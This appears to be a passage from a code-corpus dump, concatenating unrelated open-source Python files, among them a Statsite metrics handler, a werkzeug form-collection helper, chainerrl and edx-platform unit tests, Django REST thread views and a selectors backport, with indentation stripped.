auto_pause_dist_threshold, delta_t = next(inter_dist_iter)
recovered_duration += delta_t
except StopIteration:
pass
if auto_pause_dist_threshold == 0:
raise ValueError("Bad auto-pause distance threshold %f" % auto_pause_dist_threshold)
# Then re-iter through our waypoints and return wapoint type (regular/pause/resume) for each
# We do this instead of overwriting the waypoint values since that would mess up uploads to other serivces that don't want this automatic calculation
# We decrement recovered_duration back to 0 and stop adding pauses after that point, in the hopes of having the best success hitting the target duration
in_pause = False
for wp_a, wp_b in pairwise(waypoints):
delta_t = (wp_b.Timestamp - wp_a.Timestamp).total_seconds()
delta_d = None
if wp_a.Location and wp_b.Location and wp_a.Location.Latitude is not None and wp_b.Location.Latitude is not None:
delta_d = (wp_a.Location.Latitude - wp_b.Location.Latitude) ** 2 + (wp_a.Location.Longitude - wp_b.Location.Longitude) ** 2
if ((auto_pause_time_threshold is not None and delta_t > auto_pause_time_threshold) or (auto_pause_dist_threshold is not None and delta_d is not None and delta_d < auto_pause_dist_threshold)) and recovered_duration > 0:
recovered_duration -= delta_t
yield WaypointType.Pause
in_pause = True
else:
yield WaypointType.Resume if in_pause else WaypointType.Regular
in_pause = False
# Since we were iterating pairwise above, we need 1 extra for the last waypoint
yield WaypointType.Resume if in_pause else WaypointType.Regular
|
apache-2.0
|
Ssawa/Diamond
|
src/diamond/handler/statsite.py
|
57
|
5987
|
# coding=utf-8
"""
Send metrics to a [Statsite](https://github.com/armon/statsite/)
using the default interface.
Statsite
========
This is a stats aggregation server. Statsite is based heavily
on Etsy's [StatsD](https://github.com/etsy/statsd). This is
a re-implementation of the Python version of
[statsite](https://github.com/kiip/statsite).
Features
--------
* Basic key/value metrics
* Send timer data, statsite will calculate:
- Mean
- Min/Max
- Standard deviation
- Median, Percentile 95, Percentile 99
* Send counters that statsite will aggregate
Architecture
-------------
Statsite is designed to be both highly performant,
and very flexible. To achieve this, it implements the stats
collection and aggregation in pure C, using libev to be
extremely fast. This allows it to handle hundreds of connections,
and millions of metrics. After each flush interval expires,
statsite performs a fork/exec to start a new stream handler
invoking a specified application. Statsite then streams the
aggregated metrics over stdin to the application, which is
free to handle the metrics as it sees fit.
This allows statsite to aggregate metrics and then ship metrics
to any number of sinks (Graphite, SQL databases, etc). There
is an included Python script that ships metrics to graphite.
Additionally, statsite tries to minimize memory usage by not
storing all the metrics that are received. Counter values are
aggregated as they are received, and timer values are stored
and aggregated using the Cormode-Muthurkrishnan algorithm from
"Effective Computation of Biased Quantiles over Data Streams".
This means that the percentile values are not perfectly accurate,
and are subject to a specifiable error epsilon. This allows us to
store only a fraction of the samples.
"""
from Handler import Handler
import socket
class StatsiteHandler(Handler):
"""
Implements the abstract Handler class, sending data to statsite
"""
RETRY = 3
def __init__(self, config=None):
"""
Create a new instance of the StatsiteHandler class
"""
# Initialize Handler
Handler.__init__(self, config)
# Initialize Data
self.socket = None
# Initialize Options
self.host = self.config['host']
self.tcpport = int(self.config['tcpport'])
self.udpport = int(self.config['udpport'])
self.timeout = int(self.config['timeout'])
# Connect
self._connect()
def get_default_config_help(self):
"""
Returns the help text for the configuration options for this handler
"""
config = super(StatsiteHandler, self).get_default_config_help()
config.update({
'host': '',
'tcpport': '',
'udpport': '',
'timeout': '',
})
return config
def get_default_config(self):
"""
Return the default config for the handler
"""
config = super(StatsiteHandler, self).get_default_config()
config.update({
'host': '',
'tcpport': 1234,
'udpport': 1234,
'timeout': 5,
})
return config
def __del__(self):
"""
Destroy instance of the StatsiteHandler class
"""
self._close()
def process(self, metric):
"""
Process a metric by sending it to statsite
"""
# Just send the data as a string
self._send(str(metric))
def _send(self, data):
"""
Send data to statsite. Data that can not be sent will be queued.
"""
retry = self.RETRY
# Attempt to send any data in the queue
while retry > 0:
# Check socket
if not self.socket:
# Log Error
self.log.error("StatsiteHandler: Socket unavailable.")
# Attempt to restablish connection
self._connect()
# Decrement retry
retry -= 1
# Try again
continue
try:
# Send data to socket
data = data.split()
data = data[0] + ":" + data[1] + "|kv\n"
self.socket.sendall(data)
# Done
break
except socket.error, e:
# Log Error
self.log.error("StatsiteHandler: Failed sending data. %s.", e)
# Attempt to restablish connection
self._close()
# Decrement retry
retry -= 1
# try again
continue
def _connect(self):
"""
Connect to the statsite server
"""
# Create socket
if self.udpport > 0:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = self.udpport
elif self.tcpport > 0:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = self.tcpport
if socket is None:
# Log Error
self.log.error("StatsiteHandler: Unable to create socket.")
# Close Socket
self._close()
return
# Set socket timeout
self.socket.settimeout(self.timeout)
# Connect to statsite server
try:
self.socket.connect((self.host, self.port))
# Log
self.log.debug("Established connection to statsite server %s:%d",
self.host, self.port)
except Exception, ex:
# Log Error
self.log.error("StatsiteHandler: Failed to connect to %s:%i. %s",
self.host, self.port, ex)
# Close Socket
self._close()
return
def _close(self):
"""
Close the socket
"""
if self.socket is not None:
self.socket.close()
self.socket = None
|
mit
|
bravominski/PennApps2015-HeartMates
|
venv/lib/python2.7/site-packages/werkzeug/testsuite/multipart/collect.py
|
248
|
1584
|
#!/usr/bin/env python
"""
Hacky helper application to collect form data.
"""
from werkzeug.serving import run_simple
from werkzeug.wrappers import Request, Response
def copy_stream(request):
from os import mkdir
from time import time
folder = 'request-%d' % time()
mkdir(folder)
environ = request.environ
f = open(folder + '/request.txt', 'wb+')
f.write(environ['wsgi.input'].read(int(environ['CONTENT_LENGTH'])))
f.flush()
f.seek(0)
environ['wsgi.input'] = f
request.stat_folder = folder
def stats(request):
copy_stream(request)
f1 = request.files['file1']
f2 = request.files['file2']
text = request.form['text']
f1.save(request.stat_folder + '/file1.bin')
f2.save(request.stat_folder + '/file2.bin')
open(request.stat_folder + '/text.txt', 'w').write(text.encode('utf-8'))
return Response('Done.')
def upload_file(request):
return Response('''
<h1>Upload File</h1>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file1"><br>
<input type="file" name="file2"><br>
<textarea name="text"></textarea><br>
<input type="submit" value="Send">
</form>
''', mimetype='text/html')
def application(environ, start_responseonse):
request = Request(environ)
if request.method == 'POST':
response = stats(request)
else:
response = upload_file(request)
return response(environ, start_responseonse)
if __name__ == '__main__':
run_simple('localhost', 5000, application, use_debugger=True)
|
apache-2.0
|
toslunar/chainerrl
|
tests/experiments_tests/test_train_agent_batch.py
|
1
|
5850
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import math
import tempfile
import unittest
from chainer import testing
import mock
import chainerrl
@testing.parameterize(*testing.product({
'num_envs': [1, 2],
'max_episode_len': [None, 2],
'steps': [5, 6],
}))
class TestTrainAgentBatch(unittest.TestCase):
def test(self):
steps = self.steps
outdir = tempfile.mkdtemp()
agent = mock.Mock()
agent.batch_act_and_train.side_effect = [[1] * self.num_envs] * 1000
def make_env():
env = mock.Mock()
env.reset.side_effect = [('state', 0)] * 1000
if self.max_episode_len is None:
# Episodic env that terminates after 5 actions
env.step.side_effect = [
(('state', 1), 0, False, {}),
(('state', 2), 0, False, {}),
(('state', 3), -0.5, False, {}),
(('state', 4), 0, False, {}),
(('state', 5), 1, True, {}),
] * 1000
else:
# Continuing env
env.step.side_effect = [
(('state', 1), 0, False, {}),
] * 1000
return env
vec_env = chainerrl.envs.SerialVectorEnv(
[make_env() for _ in range(self.num_envs)])
hook = mock.Mock()
chainerrl.experiments.train_agent_batch(
agent=agent,
env=vec_env,
steps=steps,
outdir=outdir,
max_episode_len=self.max_episode_len,
step_hooks=[hook],
)
iters = math.ceil(steps / self.num_envs)
self.assertEqual(agent.batch_act_and_train.call_count, iters)
self.assertEqual(agent.batch_observe_and_train.call_count, iters)
for env in vec_env.envs:
if self.max_episode_len is None:
if self.num_envs == 1:
if self.steps == 6:
# In the beginning and after 5 iterations
self.assertEqual(env.reset.call_count, 2)
else:
assert steps == 5
# Only in the beginning. While the last state is
# terminal, env.reset should not be called because
# training is complete.
self.assertEqual(env.reset.call_count, 1)
elif self.num_envs == 2:
# Only in the beginning
self.assertEqual(env.reset.call_count, 1)
else:
assert False
elif self.max_episode_len == 2:
if self.num_envs == 1:
# In the beginning, after 2 and 4 iterations
self.assertEqual(env.reset.call_count, 3)
elif self.num_envs == 2:
# In the beginning, after 2 iterations
self.assertEqual(env.reset.call_count, 2)
else:
assert False
self.assertEqual(env.step.call_count, iters)
if steps % self.num_envs == 0:
self.assertEqual(hook.call_count, steps)
else:
self.assertEqual(hook.call_count, self.num_envs * iters)
# A hook receives (env, agent, step)
for i, call in enumerate(hook.call_args_list):
args, kwargs = call
self.assertEqual(args[0], vec_env)
self.assertEqual(args[1], agent)
# step starts with 1
self.assertEqual(args[2], i + 1)
class TestTrainAgentBatchNeedsReset(unittest.TestCase):
def test_needs_reset(self):
steps = 10
outdir = tempfile.mkdtemp()
agent = mock.Mock()
agent.batch_act_and_train.side_effect = [[1, 1]] * 5
def make_env(idx):
env = mock.Mock()
if idx == 0:
# First episode: 0 -> 1 -> 2 -> 3 (reset)
# Second episode: 4 -> 5 -> 6 -> 7 (done)
env.reset.side_effect = [('state', 0), ('state', 4)]
env.step.side_effect = [
(('state', 1), 0, False, {}),
(('state', 2), 0, False, {}),
(('state', 3), 0, False, {'needs_reset': True}),
(('state', 5), -0.5, False, {}),
(('state', 6), 0, False, {}),
(('state', 7), 1, True, {}),
]
else:
# First episode: 0 -> 1 (reset)
# Second episode: 2 -> 3 (reset)
# Third episode: 4 -> 5 -> 6 -> 7 (done)
env.reset.side_effect = [
('state', 0), ('state', 2), ('state', 4)]
env.step.side_effect = [
(('state', 1), 0, False, {'needs_reset': True}),
(('state', 3), 0, False, {'needs_reset': True}),
(('state', 5), -0.5, False, {}),
(('state', 6), 0, False, {}),
(('state', 7), 1, True, {}),
]
return env
vec_env = chainerrl.envs.SerialVectorEnv(
[make_env(i) for i in range(2)])
chainerrl.experiments.train_agent_batch(
agent=agent,
env=vec_env,
steps=steps,
outdir=outdir,
)
self.assertEqual(vec_env.envs[0].reset.call_count, 2)
self.assertEqual(vec_env.envs[0].step.call_count, 5)
self.assertEqual(vec_env.envs[1].reset.call_count, 3)
self.assertEqual(vec_env.envs[1].step.call_count, 5)
|
mit
|
motion2015/edx-platform
|
lms/djangoapps/notes/tests.py
|
129
|
16454
|
"""
Unit tests for the notes app.
"""
from mock import patch, Mock
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.test import TestCase, RequestFactory
from django.test.client import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
import json
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from courseware.tabs import get_course_tab_list, CourseTab
from student.tests.factories import UserFactory, CourseEnrollmentFactory
from notes import utils, api, models
class UtilsTest(ModuleStoreTestCase):
""" Tests for the notes utils. """
def setUp(self):
'''
Setup a dummy course-like object with a tabs field that can be
accessed via attribute lookup.
'''
super(UtilsTest, self).setUp()
self.course = CourseFactory.create()
def test_notes_not_enabled(self):
'''
Tests that notes are disabled when the course tab configuration does NOT
contain a tab with type "notes."
'''
self.assertFalse(utils.notes_enabled_for_course(self.course))
def test_notes_enabled(self):
'''
Tests that notes are enabled when the course tab configuration contains
a tab with type "notes."
'''
with self.settings(FEATURES={'ENABLE_STUDENT_NOTES': True}):
self.course.advanced_modules = ["notes"]
self.assertTrue(utils.notes_enabled_for_course(self.course))
class CourseTabTest(ModuleStoreTestCase):
"""
Test that the course tab shows up the way we expect.
"""
def setUp(self):
'''
Setup a dummy course-like object with a tabs field that can be
accessed via attribute lookup.
'''
super(CourseTabTest, self).setUp()
self.course = CourseFactory.create()
self.user = UserFactory()
CourseEnrollmentFactory.create(user=self.user, course_id=self.course.id)
def enable_notes(self):
"""Enable notes and add the tab to the course."""
self.course.tabs.append(CourseTab.load("notes"))
self.course.advanced_modules = ["notes"]
def has_notes_tab(self, course, user):
""" Returns true if the current course and user have a notes tab, false otherwise. """
request = RequestFactory().request()
request.user = user
all_tabs = get_course_tab_list(request, course)
return any([tab.name == u'My Notes' for tab in all_tabs])
def test_course_tab_not_visible(self):
# module not enabled in the course
self.assertFalse(self.has_notes_tab(self.course, self.user))
with self.settings(FEATURES={'ENABLE_STUDENT_NOTES': False}):
# setting not enabled and the module is not enabled
self.assertFalse(self.has_notes_tab(self.course, self.user))
# module is enabled and the setting is not enabled
self.course.advanced_modules = ["notes"]
self.assertFalse(self.has_notes_tab(self.course, self.user))
def test_course_tab_visible(self):
self.enable_notes()
self.assertTrue(self.has_notes_tab(self.course, self.user))
self.course.advanced_modules = []
self.assertFalse(self.has_notes_tab(self.course, self.user))
class ApiTest(TestCase):
def setUp(self):
super(ApiTest, self).setUp()
self.client = Client()
# Mocks
patcher = patch.object(api, 'api_enabled', Mock(return_value=True))
patcher.start()
self.addCleanup(patcher.stop)
# Create two accounts
self.password = 'abc'
self.student = User.objects.create_user('student', '[email protected]', self.password)
self.student2 = User.objects.create_user('student2', '[email protected]', self.password)
self.instructor = User.objects.create_user('instructor', '[email protected]', self.password)
self.course_key = SlashSeparatedCourseKey('HarvardX', 'CB22x', 'The_Ancient_Greek_Hero')
self.note = {
'user': self.student,
'course_id': self.course_key,
'uri': '/',
'text': 'foo',
'quote': 'bar',
'range_start': 0,
'range_start_offset': 0,
'range_end': 100,
'range_end_offset': 0,
'tags': 'a,b,c'
}
# Make sure no note with this ID ever exists for testing purposes
self.NOTE_ID_DOES_NOT_EXIST = 99999
def login(self, as_student=None):
username = None
password = self.password
if as_student is None:
username = self.student.username
else:
username = as_student.username
self.client.login(username=username, password=password)
def url(self, name, args={}):
args.update({'course_id': self.course_key.to_deprecated_string()})
return reverse(name, kwargs=args)
def create_notes(self, num_notes, create=True):
notes = []
for n in range(num_notes):
note = models.Note(**self.note)
if create:
note.save()
notes.append(note)
return notes
def test_root(self):
self.login()
resp = self.client.get(self.url('notes_api_root'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertEqual(set(('name', 'version')), set(content.keys()))
self.assertIsInstance(content['version'], int)
self.assertEqual(content['name'], 'Notes API')
def test_index_empty(self):
self.login()
resp = self.client.get(self.url('notes_api_notes'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertEqual(len(content), 0)
def test_index_with_notes(self):
num_notes = 3
self.login()
self.create_notes(num_notes)
resp = self.client.get(self.url('notes_api_notes'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertIsInstance(content, list)
self.assertEqual(len(content), num_notes)
def test_index_max_notes(self):
self.login()
MAX_LIMIT = api.API_SETTINGS.get('MAX_NOTE_LIMIT')
num_notes = MAX_LIMIT + 1
self.create_notes(num_notes)
resp = self.client.get(self.url('notes_api_notes'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertIsInstance(content, list)
self.assertEqual(len(content), MAX_LIMIT)
def test_create_note(self):
self.login()
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note_dict = notes[0].as_dict()
excluded_fields = ['id', 'user_id', 'created', 'updated']
note = dict([(k, v) for k, v in note_dict.items() if k not in excluded_fields])
resp = self.client.post(self.url('notes_api_notes'),
json.dumps(note),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 303)
self.assertEqual(len(resp.content), 0)
def test_create_empty_notes(self):
self.login()
for empty_test in [None, [], '']:
resp = self.client.post(self.url('notes_api_notes'),
json.dumps(empty_test),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 400)
def test_create_note_missing_ranges(self):
self.login()
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note_dict = notes[0].as_dict()
excluded_fields = ['id', 'user_id', 'created', 'updated'] + ['ranges']
note = dict([(k, v) for k, v in note_dict.items() if k not in excluded_fields])
resp = self.client.post(self.url('notes_api_notes'),
json.dumps(note),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 400)
def test_read_note(self):
self.login()
notes = self.create_notes(3)
self.assertEqual(len(notes), 3)
for note in notes:
resp = self.client.get(self.url('notes_api_note', {'note_id': note.pk}))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertEqual(content['id'], note.pk)
self.assertEqual(content['user_id'], note.user_id)
def test_note_doesnt_exist_to_read(self):
self.login()
resp = self.client.get(self.url('notes_api_note', {
'note_id': self.NOTE_ID_DOES_NOT_EXIST
}))
self.assertEqual(resp.status_code, 404)
self.assertEqual(resp.content, '')
def test_student_doesnt_have_permission_to_read_note(self):
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note = notes[0]
# set the student id to a different student (not the one that created the notes)
self.login(as_student=self.student2)
resp = self.client.get(self.url('notes_api_note', {'note_id': note.pk}))
self.assertEqual(resp.status_code, 403)
self.assertEqual(resp.content, '')
def test_delete_note(self):
self.login()
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note = notes[0]
resp = self.client.delete(self.url('notes_api_note', {
'note_id': note.pk
}))
self.assertEqual(resp.status_code, 204)
self.assertEqual(resp.content, '')
with self.assertRaises(models.Note.DoesNotExist):
models.Note.objects.get(pk=note.pk)
def test_note_does_not_exist_to_delete(self):
self.login()
resp = self.client.delete(self.url('notes_api_note', {
'note_id': self.NOTE_ID_DOES_NOT_EXIST
}))
self.assertEqual(resp.status_code, 404)
self.assertEqual(resp.content, '')
def test_student_doesnt_have_permission_to_delete_note(self):
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note = notes[0]
self.login(as_student=self.student2)
resp = self.client.delete(self.url('notes_api_note', {
'note_id': note.pk
}))
self.assertEqual(resp.status_code, 403)
self.assertEqual(resp.content, '')
try:
models.Note.objects.get(pk=note.pk)
except models.Note.DoesNotExist:
self.fail('note should exist and not be deleted because the student does not have permission to do so')
def test_update_note(self):
notes = self.create_notes(1)
note = notes[0]
updated_dict = note.as_dict()
updated_dict.update({
'text': 'itchy and scratchy',
'tags': ['simpsons', 'cartoons', 'animation']
})
self.login()
resp = self.client.put(self.url('notes_api_note', {'note_id': note.pk}),
json.dumps(updated_dict),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 303)
self.assertEqual(resp.content, '')
actual = models.Note.objects.get(pk=note.pk)
actual_dict = actual.as_dict()
for field in ['text', 'tags']:
self.assertEqual(actual_dict[field], updated_dict[field])
def test_search_note_params(self):
self.login()
total = 3
notes = self.create_notes(total)
invalid_uri = ''.join([note.uri for note in notes])
tests = [{'limit': 0, 'offset': 0, 'expected_rows': total},
{'limit': 0, 'offset': 2, 'expected_rows': total - 2},
{'limit': 0, 'offset': total, 'expected_rows': 0},
{'limit': 1, 'offset': 0, 'expected_rows': 1},
{'limit': 2, 'offset': 0, 'expected_rows': 2},
{'limit': total, 'offset': 2, 'expected_rows': 1},
{'limit': total, 'offset': total, 'expected_rows': 0},
{'limit': total + 1, 'offset': total + 1, 'expected_rows': 0},
{'limit': total + 1, 'offset': 0, 'expected_rows': total},
{'limit': 0, 'offset': 0, 'uri': invalid_uri, 'expected_rows': 0, 'expected_total': 0}]
for test in tests:
params = dict([(k, str(test[k]))
for k in ('limit', 'offset', 'uri')
if k in test])
resp = self.client.get(self.url('notes_api_search'),
params,
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
for expected_key in ('total', 'rows'):
self.assertTrue(expected_key in content)
if 'expected_total' in test:
self.assertEqual(content['total'], test['expected_total'])
else:
self.assertEqual(content['total'], total)
self.assertEqual(len(content['rows']), test['expected_rows'])
for row in content['rows']:
self.assertTrue('id' in row)
class NoteTest(TestCase):
def setUp(self):
super(NoteTest, self).setUp()
self.password = 'abc'
self.student = User.objects.create_user('student', '[email protected]', self.password)
self.course_key = SlashSeparatedCourseKey('HarvardX', 'CB22x', 'The_Ancient_Greek_Hero')
self.note = {
'user': self.student,
'course_id': self.course_key,
'uri': '/',
'text': 'foo',
'quote': 'bar',
'range_start': 0,
'range_start_offset': 0,
'range_end': 100,
'range_end_offset': 0,
'tags': 'a,b,c'
}
def test_clean_valid_note(self):
reference_note = models.Note(**self.note)
body = reference_note.as_dict()
note = models.Note(course_id=self.course_key, user=self.student)
try:
note.clean(json.dumps(body))
self.assertEqual(note.uri, body['uri'])
self.assertEqual(note.text, body['text'])
self.assertEqual(note.quote, body['quote'])
self.assertEqual(note.range_start, body['ranges'][0]['start'])
self.assertEqual(note.range_start_offset, body['ranges'][0]['startOffset'])
self.assertEqual(note.range_end, body['ranges'][0]['end'])
self.assertEqual(note.range_end_offset, body['ranges'][0]['endOffset'])
self.assertEqual(note.tags, ','.join(body['tags']))
except ValidationError:
self.fail('a valid note should not raise an exception')
def test_clean_invalid_note(self):
note = models.Note(course_id=self.course_key, user=self.student)
for empty_type in (None, '', 0, []):
with self.assertRaises(ValidationError):
note.clean(None)
with self.assertRaises(ValidationError):
note.clean(json.dumps({
'text': 'foo',
'quote': 'bar',
'ranges': [{} for i in range(10)] # too many ranges
}))
def test_as_dict(self):
note = models.Note(course_id=self.course_key, user=self.student)
d = note.as_dict()
self.assertNotIsInstance(d, basestring)
self.assertEqual(d['user_id'], self.student.id)
self.assertTrue('course_id' not in d)
|
agpl-3.0
|
varunarya10/oslo.middleware
|
doc/source/conf.py
|
4
|
2462
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'oslosphinx'
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'oslo.middleware'
copyright = u'2014, OpenStack Foundation'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
apache-2.0
|
olegpshenichniy/truechat
|
server/api/thread/views.py
|
1
|
2146
|
from rest_framework import generics
from rest_framework.exceptions import PermissionDenied
from .models import PrivateThread, GroupThread
from .serializers import PrivateThreadListCreateSerializer, PrivateThreadRetrieveDestroySerializer
from .serializers import GroupThreadListCreateSerializer, GroupThreadRetrieveUpdateDestroySerializer
#########################
##### PrivateThread #####
#########################
class PrivateThreadListCreateAPIView(generics.ListCreateAPIView):
model = PrivateThread
serializer_class = PrivateThreadListCreateSerializer
filter_fields = ('initiator',)
def get_queryset(self):
return PrivateThread.objects.filter(participants=self.request.user)
class PrivateThreadRetrieveDestroyAPIView(generics.RetrieveDestroyAPIView):
model = PrivateThread
serializer_class = PrivateThreadRetrieveDestroySerializer
def get_queryset(self):
return PrivateThread.objects.filter(participants=self.request.user)
def delete(self, request, *args, **kwargs):
# only participant can delete
if request.user not in self.get_object().participants.all():
raise PermissionDenied()
return super(PrivateThreadRetrieveDestroyAPIView, self).delete(request, *args, **kwargs)
#######################
##### GroupThread #####
#######################
class GroupThreadListCreateAPIView(generics.ListCreateAPIView):
model = GroupThread
serializer_class = GroupThreadListCreateSerializer
def get_queryset(self):
return GroupThread.objects.filter(participants=self.request.user)
class GroupThreadRetrieveUpdateDestroyAPIView(generics.RetrieveUpdateDestroyAPIView):
model = GroupThread
serializer_class = GroupThreadRetrieveUpdateDestroySerializer
def get_queryset(self):
return GroupThread.objects.filter(participants=self.request.user)
def delete(self, request, *args, **kwargs):
# only owner can delete
if request.user != self.get_object().owner:
raise PermissionDenied()
return super(GroupThreadRetrieveUpdateDestroyAPIView, self).delete(request, *args, **kwargs)
|
mit
|
dgarros/ansible
|
lib/ansible/compat/selectors/_selectors2.py
|
124
|
24265
|
# This file is from the selectors2.py package. It backports the PSF Licensed
# selectors module from the Python-3.5 stdlib to older versions of Python.
# The author, Seth Michael Larson, dual licenses his modifications under the
# PSF License and MIT License:
# https://github.com/SethMichaelLarson/selectors2#license
#
# Seth's copy of the MIT license is reproduced below
#
# MIT License
#
# Copyright (c) 2016 Seth Michael Larson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Backport of selectors.py from Python 3.5+ to support Python < 3.4
# Also has the behavior specified in PEP 475 which is to retry syscalls
# in the case of an EINTR error. This module is required because selectors34
# does not follow this behavior and instead returns that no dile descriptor
# events have occurred rather than retry the syscall. The decision to drop
# support for select.devpoll is made to maintain 100% test coverage.
import errno
import math
import select
import socket
import sys
import time
from collections import namedtuple, Mapping
try:
monotonic = time.monotonic
except (AttributeError, ImportError): # Python 3.3<
monotonic = time.time
__author__ = 'Seth Michael Larson'
__email__ = '[email protected]'
__version__ = '1.1.0'
__license__ = 'MIT'
__all__ = [
'EVENT_READ',
'EVENT_WRITE',
'SelectorError',
'SelectorKey',
'DefaultSelector'
]
EVENT_READ = (1 << 0)
EVENT_WRITE = (1 << 1)
HAS_SELECT = True # Variable that shows whether the platform has a selector.
_SYSCALL_SENTINEL = object() # Sentinel in case a system call returns None.
class SelectorError(Exception):
def __init__(self, errcode):
super(SelectorError, self).__init__()
self.errno = errcode
def __repr__(self):
return "<SelectorError errno={0}>".format(self.errno)
def __str__(self):
return self.__repr__()
def _fileobj_to_fd(fileobj):
""" Return a file descriptor from a file object. If
given an integer will simply return that integer back. """
if isinstance(fileobj, int):
fd = fileobj
else:
try:
fd = int(fileobj.fileno())
except (AttributeError, TypeError, ValueError):
raise ValueError("Invalid file object: {0!r}".format(fileobj))
if fd < 0:
raise ValueError("Invalid file descriptor: {0}".format(fd))
return fd
# Python 3.5 uses a more direct route to wrap system calls to increase speed.
if sys.version_info >= (3, 5):
def _syscall_wrapper(func, _, *args, **kwargs):
""" This is the short-circuit version of the below logic
because in Python 3.5+ all selectors restart system calls. """
try:
return func(*args, **kwargs)
except (OSError, IOError, select.error) as e:
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
elif hasattr(e, "args"):
errcode = e.args[0]
raise SelectorError(errcode)
else:
def _syscall_wrapper(func, recalc_timeout, *args, **kwargs):
""" Wrapper function for syscalls that could fail due to EINTR.
All functions should be retried if there is time left in the timeout
in accordance with PEP 475. """
timeout = kwargs.get("timeout", None)
if timeout is None:
expires = None
recalc_timeout = False
else:
timeout = float(timeout)
if timeout < 0.0: # Timeout less than 0 treated as no timeout.
expires = None
else:
expires = monotonic() + timeout
args = list(args)
if recalc_timeout and "timeout" not in kwargs:
raise ValueError(
"Timeout must be in args or kwargs to be recalculated")
result = _SYSCALL_SENTINEL
while result is _SYSCALL_SENTINEL:
try:
result = func(*args, **kwargs)
# OSError is thrown by select.select
# IOError is thrown by select.epoll.poll
# select.error is thrown by select.poll.poll
# Aren't we thankful for Python 3.x rework for exceptions?
except (OSError, IOError, select.error) as e:
# select.error wasn't a subclass of OSError in the past.
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
elif hasattr(e, "args"):
errcode = e.args[0]
# Also test for the Windows equivalent of EINTR.
is_interrupt = (errcode == errno.EINTR or (hasattr(errno, "WSAEINTR") and
errcode == errno.WSAEINTR))
if is_interrupt:
if expires is not None:
current_time = monotonic()
if current_time > expires:
